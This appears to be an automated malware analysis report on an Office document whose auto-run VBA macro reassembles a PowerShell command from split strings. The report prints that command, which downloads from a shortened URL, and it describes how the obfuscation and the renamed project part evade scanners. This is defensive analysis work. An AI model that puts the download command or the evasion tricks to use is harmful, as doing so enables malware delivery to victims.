MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Office document containing a VBA macro that is automatically executed upon opening (Auto_Open). The macro reassembles a PowerShell command from split string literals, specifically "powershell.exe -c \"cmd msgsbox/rm shtahttp://www.bitly.com/asdoaksdoasdoaaskdmsdokasdoaaskdmsdok\"". This command is designed to download and execute a payload from the provided URL. The obfuscation techniques used, such as splitting string literals and renaming VBA project parts, are common in malicious documents.
Heuristics 5
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
VBA project inside OOXML medium OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/kadoaksd.b)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.basdb9568918bac689b90e746b2b05598a9ed9aff6533bf6e6a375ccd3b0dc9f8af |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 908 bytes |
vbaProject_00.bin30759c46451469b42f754667935c9812cb864ea72364cb9779230fe103fc4c9d |
vba-project | OOXML VBA project: ppt/kadoaksd.b | 13824 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.